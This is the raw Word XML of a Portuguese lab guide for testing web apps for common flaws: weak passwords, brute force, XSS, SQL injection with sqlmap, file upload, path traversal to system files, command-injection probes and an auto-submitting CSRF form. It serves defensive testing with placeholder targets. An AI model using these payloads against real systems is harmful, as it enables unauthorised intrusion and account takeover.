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E1C3A3" wp14:paraId="02007767" wp14:textId="077EF586">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="322" w:beforeAutospacing="off" w:after="322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Visão geral de uso</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="058ECCC9" wp14:textId="24179BD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Substitua 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BASE_URL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ENDPOINT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COOKIE_SESSAO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>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="73418085" wp14:textId="5B42A07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>Rode em rede isolada (ex.: Docker compose com banco “descartável”).</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="444819C5" wp14:textId="26C2DC7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>Registre tudo em arquivo</w:t>
      </w:r>
      <w:r w:rsidRPr="3DE1C3A3" w:rsidR="7DB68E1C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>s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gerar relatório depois.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="7F4E2E80" wp14:textId="527E5BDF"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="708B0A8E" wp14:textId="7D1227E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299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1) Falta de política de senhas (cadastro/reset)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="56ABFAF1" wp14:textId="63E384F4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281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Objetivo</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="004423C7" wp14:textId="14E42603">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pP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>Ver se o backend aceita senhas fracas e não aplica requisitos mínimos.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="5C3EBB7A" wp14:textId="160C9992">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281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Teste rápido (cadastro):</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="396A1B84" wp14:textId="66FF7B4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# senha fraca "123456"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curl -i -X POST "</w:t>
      </w:r>
      <w:hyperlink r:id="Ra165f71b36374103">
        <w:r w:rsidRPr="3DE1C3A3" w:rsidR="0755C3D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https://BASE_URL/api/register</w:t>
        </w:r>
      </w:hyperlink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" \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-H "Content-Type: application/json" \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-d '</w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="3DE1C3A3" w:rsidR="0755C3D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{"email":"user1@test.local","password":"123456</w:t>
        </w:r>
      </w:hyperlink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"}'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="68AB30C1" wp14:textId="094599FB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281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Lote de senhas fracas (sem </w:t>
      </w:r>
      <w:r w:rsidRPr="3DE1C3A3" w:rsidR="0755C3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brute</w:t>
      </w:r>
      <w:r w:rsidRPr="3DE1C3A3" w:rsidR="0755C3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force, só 1 tentativa por senha):</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="169D5F5A" wp14:textId="527E999A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3DE1C3A3" w:rsidR="0755C3D7">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>OBS: Coloque o que quiser de senha no lote</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="258A9875" wp14:textId="5323236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cat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&gt; weak_pw.txt &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="7F7373D5" wp14:textId="044997E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>Admin</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="3325E4A1" wp14:textId="3A585F9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>admin</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="4BC9B3C4" wp14:textId="0E26342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>123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>123456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>password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>qwerty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>111111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>abc12345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>admin123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>EOF</w:t>
      </w:r>
      <w:r>
        <w:br/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>while read pw; do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echo "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>Testando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>senha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>: $pw"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curl -s -X POST "</w:t>
      </w:r>
      <w:hyperlink r:id="R0883eeb9b7ee4b7c">
        <w:r w:rsidRPr="3DE1C3A3" w:rsidR="0755C3D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https://BASE_URL/api/register</w:t>
        </w:r>
      </w:hyperlink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>" \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-H "Content-Type: application/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>" \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-d "</w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="3DE1C3A3" w:rsidR="0755C3D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{\"email\":\"pw-$pw@test.local\",\"password\":\"$pw\</w:t>
        </w:r>
      </w:hyperlink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>"}" | tee -a senha_politica.log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sleep 0.5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en-US"/>
        </w:rPr>
        <w:t>done &lt; weak_pw.txt</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="592B6FD1" wp14:textId="21BE8215">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240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Esperado seguro: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Rejeitar fracas e retornar mensagens genéricas (sem detalhar regra exata).</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="273F1859" wp14:textId="6278D6CA"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="49C460E6" wp14:textId="74F9EEE9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299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2) Tratamento de erro inapropriado (exposição de stack trace)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="74277186" wp14:textId="357554D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# Envie payload inválido para provocar erro controlado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curl -i -X POST "</w:t>
      </w:r>
      <w:hyperlink r:id="Rb0d19ad5e74f4664">
        <w:r w:rsidRPr="3DE1C3A3" w:rsidR="0755C3D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https://BASE_URL/api/items</w:t>
        </w:r>
      </w:hyperlink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" \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-H "Content-Type: application/json" \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-d '{"price":"NAO_NUMERO"}'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="3472770C" wp14:textId="343514BF">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240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Sinais de falha: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stack trace, nomes de classes, SQL bruto, caminhos do servidor.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="707FAC58" wp14:textId="3AFB6AFD"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="17E132CC" wp14:textId="049DA929">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299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3) Falta de proteção contra força bruta (login)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="3ABF106D" wp14:textId="637B45D6">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240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Importante: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teste em poucas tentativas, com espera entre elas, somente no seu lab.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="79991C17" wp14:textId="21045AD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cat &gt; few_attempts.txt &lt;&lt;'EOF'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wrongpass1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wrongpass2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correcthorsebatterystaple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EOF</w:t>
      </w:r>
      <w:r>
        <w:br/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i=0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while read pw; do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i=$((i+1))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echo "Tentativa $i"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curl -i -s -X POST "</w:t>
      </w:r>
      <w:hyperlink r:id="R2d5e3187a70945e5">
        <w:r w:rsidRPr="3DE1C3A3" w:rsidR="0755C3D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https://BASE_URL/api/login</w:t>
        </w:r>
      </w:hyperlink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" \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-H "Content-Type: application/json" \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-d "{\"username\":\"victim\",\"password\":\"$pw\"}" | tee -a brute_teste.log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sleep 1  # teste de rate limiting/lockout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done &lt; few_attempts.txt</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="298FB0F6" wp14:textId="313F186D">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240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Esperado seguro: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após N falhas, bloquear/retardar; respostas e tempos indistinguíveis.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="5C4BBC96" wp14:textId="03995FDE"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="2FE5B28A" wp14:textId="6CCC9B04">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299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4) Informações sensíveis salvas “em claro”</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="7F4B2D99" wp14:textId="241F2E27">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281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Verificação no banco (MySQL de laboratório)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="68A1B79A" wp14:textId="44CAB06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-- olhe o padrão do hash (bcrypt costuma iniciar com $2y$ ou $2b$)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SELECT id, email, password FROM users LIMIT 10;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="60D79662" wp14:textId="61851CBB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281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Checagem rápida com Python (hash vs. plain)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="7839E445" wp14:textId="41D42D0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import re, csv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# supondo que você exportou users.csv com colunas: id,email,password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plain = []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hashed = []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for row in csv.DictReader(open('users.csv')):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pw = row['password']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re.match(r'^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$', pw):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hashed.append(row)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else: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plain.append(row)</w:t>
      </w:r>
      <w:r>
        <w:br/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print("Total hashed (bcrypt):", len(hashed))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print("Possíveis plaintext/ruins:", len(plain))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="417EA3A7" wp14:textId="6BB40898">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240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Esperado seguro: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senhas com hashing lento (bcrypt/argon2/scrypt) e sal.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="7BF18827" wp14:textId="4218F6A5"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="2DC7DDF2" wp14:textId="1B00567C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299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5) XSS — Reflected</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="72A3D551" wp14:textId="47742F0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# Busca com parâmetro refletido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curl -s "</w:t>
      </w:r>
      <w:hyperlink r:id="R5a5c8cfbec42477b">
        <w:r w:rsidRPr="3DE1C3A3" w:rsidR="0755C3D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https://BASE_URL/search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E</w:t>
        </w:r>
      </w:hyperlink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" \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-H "Cookie: SESSION=COOKIE_SESSAO" | grep -n "&lt;script&gt;alert(1)&lt;/script&gt;"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="7CF0EF9F" wp14:textId="5CE6C242">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240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Falha: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payload aparece executável no HTML sem encoding.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="302CB0D7" wp14:textId="1B27551C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281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XSS — Stored (ex.: comentários)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="7AB2D95E" wp14:textId="0AA35A7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curl -i -X POST "</w:t>
      </w:r>
      <w:hyperlink r:id="R6667d1451e724f96">
        <w:r w:rsidRPr="3DE1C3A3" w:rsidR="0755C3D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https://BASE_URL/api/comments</w:t>
        </w:r>
      </w:hyperlink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" \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-H "Content-Type: application/json" \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-d '{"postId":1,"text":"&lt;script&gt;alert(1)&lt;/script&gt;"}'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="278BE941" wp14:textId="3DC27964">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pP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Depois carregue a página do post e veja se dispara o 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alert(1)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3DE1C3A3" wp14:paraId="5B7B6AAC" wp14:textId="2259E78C">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240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Esperado seguro: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saída com escape/encode, CSP ativa, filtros server-side.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="763DD74D" wp14:textId="5CB83F11"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="208A7EBE" wp14:textId="61C6AABE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299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6) SQL Injection (In-band e Inferential/Blind)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="272B4585" wp14:textId="3FEEA791">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281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Manual rápido (boolean-based) — somente no seu lab</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="7D37DA21" wp14:textId="34461BE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# In-band: tenta forçar condição verdadeira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curl -i "</w:t>
      </w:r>
      <w:hyperlink r:id="R7dfdb7dae33c4ab6">
        <w:r w:rsidRPr="3DE1C3A3" w:rsidR="0755C3D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https://BASE_URL/items?id=1</w:t>
        </w:r>
      </w:hyperlink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OR 1=1"</w:t>
      </w:r>
      <w:r>
        <w:br/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# Boolean (resposta muda entre true/false)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curl -s "</w:t>
      </w:r>
      <w:hyperlink r:id="R902b50e664b843ba">
        <w:r w:rsidRPr="3DE1C3A3" w:rsidR="0755C3D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https://BASE_URL/items?id=1</w:t>
        </w:r>
      </w:hyperlink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AND 1=1" -o true.html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curl -s "</w:t>
      </w:r>
      <w:hyperlink r:id="Rb267a6b05faa4317">
        <w:r w:rsidRPr="3DE1C3A3" w:rsidR="0755C3D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https://BASE_URL/items?id=1</w:t>
        </w:r>
      </w:hyperlink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AND 1=2" -o false.html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diff true.html false.html</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="60182D6E" wp14:textId="5EAA4872">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281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Usando </w:t>
      </w:r>
      <w:r w:rsidRPr="3DE1C3A3" w:rsidR="0755C3D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sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="3DE1C3A3" w:rsidR="0755C3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(com request capturado)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="30D63BB9" wp14:textId="5FCE2D8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Capture a requisição (ex.: Burp/ZAP) em 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request.txt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3DE1C3A3" wp14:paraId="03B6CED2" wp14:textId="783F71F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>Rode:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="5C160989" wp14:textId="1A72D98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sqlmap -r request.txt --batch --risk=1 --level=1 --dbs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# Para tentar enumerar tabelas de um banco conhecido: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# sqlmap -r request.txt --batch -D NOME_BANCO --tables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# Para checar tipo de injeção sem exfiltrar dados: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# sqlmap -r request.txt --batch --technique=BT</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="1142BCC8" wp14:textId="32697196">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240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Boas práticas no lab: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limite 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--risk/--level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evite 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--os-shell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>/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--file-write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p14:paraId="68556070" wp14:textId="0049D2B5"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="4BB5A2CF" wp14:textId="4B9F2B65">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299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7) Unrestricted File Upload</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="6453DD2D" wp14:textId="28A03902">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281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Teste de extensão e MIME</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="16651421" wp14:textId="52A2BD4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# Tenta subir arquivo de teste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echo "apenas teste" &gt; teste.txt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curl -i -X POST "</w:t>
      </w:r>
      <w:hyperlink r:id="R0746bca50cfc4fcf">
        <w:r w:rsidRPr="3DE1C3A3" w:rsidR="0755C3D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https://BASE_URL/upload</w:t>
        </w:r>
      </w:hyperlink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" \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-H "Cookie: SESSION=COOKIE_SESSAO" \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-F "</w:t>
      </w:r>
      <w:hyperlink r:id="Rb52ba6495e624fd0">
        <w:r w:rsidRPr="3DE1C3A3" w:rsidR="0755C3D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file=@teste.txt</w:t>
        </w:r>
      </w:hyperlink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"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="11A216AB" wp14:textId="6D4B167B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281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Tenta bloquear executáveis disfarçados (deve ser rejeitado)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="1018A8CA" wp14:textId="3C84D7F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# arquivo .php *somente* para verificar bloqueio no lab — não execute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echo "&lt;?php echo 'x'; ?&gt;" &gt; probe.php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curl -i -X POST "</w:t>
      </w:r>
      <w:hyperlink r:id="R21dac1d9d6d3448d">
        <w:r w:rsidRPr="3DE1C3A3" w:rsidR="0755C3D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https://BASE_URL/upload</w:t>
        </w:r>
      </w:hyperlink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" \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-F "</w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="3DE1C3A3" w:rsidR="0755C3D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file=@probe.php;type=application/octet-stream</w:t>
        </w:r>
      </w:hyperlink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"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="07F00D4B" wp14:textId="2DAA933B">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240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Esperado seguro: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validação por whitelist de tipos, rechecagem de MIME no servidor, renomeação, armazenamento fora do webroot, varredura.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="7A03C3CB" wp14:textId="294202FE"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="60B8C954" wp14:textId="6A355DF9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299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8) File Inclusion (LFI/RFI) — somente laboratório</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="30BE2B66" wp14:textId="6F04449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# LFI: tentativa com path traversal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curl -i "</w:t>
      </w:r>
      <w:hyperlink r:id="Ra4803850989c461d">
        <w:r w:rsidRPr="3DE1C3A3" w:rsidR="0755C3D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https://BASE_URL/view?template=../../../../etc/hostname</w:t>
        </w:r>
      </w:hyperlink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"</w:t>
      </w:r>
      <w:r>
        <w:br/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# Em Windows (container):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curl -i "</w:t>
      </w:r>
      <w:hyperlink r:id="R02a783aa25104b4f">
        <w:r w:rsidRPr="3DE1C3A3" w:rsidR="0755C3D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https://BASE_URL/view?template=..\..\..\Windows\win.ini</w:t>
        </w:r>
      </w:hyperlink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"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="7E913844" wp14:textId="5751ECFE">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240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Esperado seguro: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normalizar caminho, bloquear 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..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>, mapear a diretório fixo, desabilitar wrappers remotos.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="076C1116" wp14:textId="255FBECF">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240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RFI: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Garanta que sua app de teste esteja em ambiente sem acesso externo; o seguro é </w:t>
      </w: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não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permitir incluir URLs.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="721C07F1" wp14:textId="09F0BBBE"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="728E24AF" wp14:textId="454EF8E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299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9) Command Execution (RCE)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="371144E7" wp14:textId="33D3CC6F">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240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Somente no seu ambiente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com comandos inofensivos.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="0BB6C1C1" wp14:textId="7C976AA1">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240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Sondagem segura (entrada que vira comando)</w:t>
      </w:r>
      <w:r>
        <w:br/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 houver endpoint tipo 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/ping?host=...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3DE1C3A3" wp14:paraId="6C4A86BE" wp14:textId="4220816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# Testa separador; a resposta NÃO deve conter "RCE_TEST"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curl -s "</w:t>
      </w:r>
      <w:hyperlink r:id="R688c371ed6684734">
        <w:r w:rsidRPr="3DE1C3A3" w:rsidR="0755C3D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https://BASE_URL/ping?host=127.0.0.1;echo</w:t>
        </w:r>
      </w:hyperlink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RCE_TEST" | grep RCE_TEST || echo "Sem eco"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="488DB67D" wp14:textId="30DB5F45">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240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Esperado seguro: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não interpretar metacaracteres (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; &amp; | \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$()`) e usar execução segura (listas/whitelists).</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="53AB42CF" wp14:textId="001E74C7"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="2DBC679E" wp14:textId="3EC44E10">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299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10) CSRF (Cross-Site Request Forgery)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="415E7E13" wp14:textId="7E5B9850">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281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Prova de conceito (PoC) genérica</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="51BCA597" wp14:textId="17C04C1B">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pP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Crie um arquivo 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csrf-poc.html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abra no navegador logado na sua app:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="3B445584" wp14:textId="18A4296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&lt;!doctype html&gt;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&lt;html&gt;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&lt;body onload="document.forms[0].submit()"&gt;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&lt;form action="https://BASE_URL/api/profile/email" method="POST"&gt;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&lt;input type="hidden" name="email" </w:t>
      </w:r>
      <w:hyperlink r:id="R68eeea7415514397">
        <w:r w:rsidRPr="3DE1C3A3" w:rsidR="0755C3D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value="csrf@attacker.local</w:t>
        </w:r>
      </w:hyperlink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"&gt;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&lt;/form&gt;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&lt;/body&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/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&lt;/html&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="5933A1C6" wp14:textId="20B0876D">
      <w:pPr>
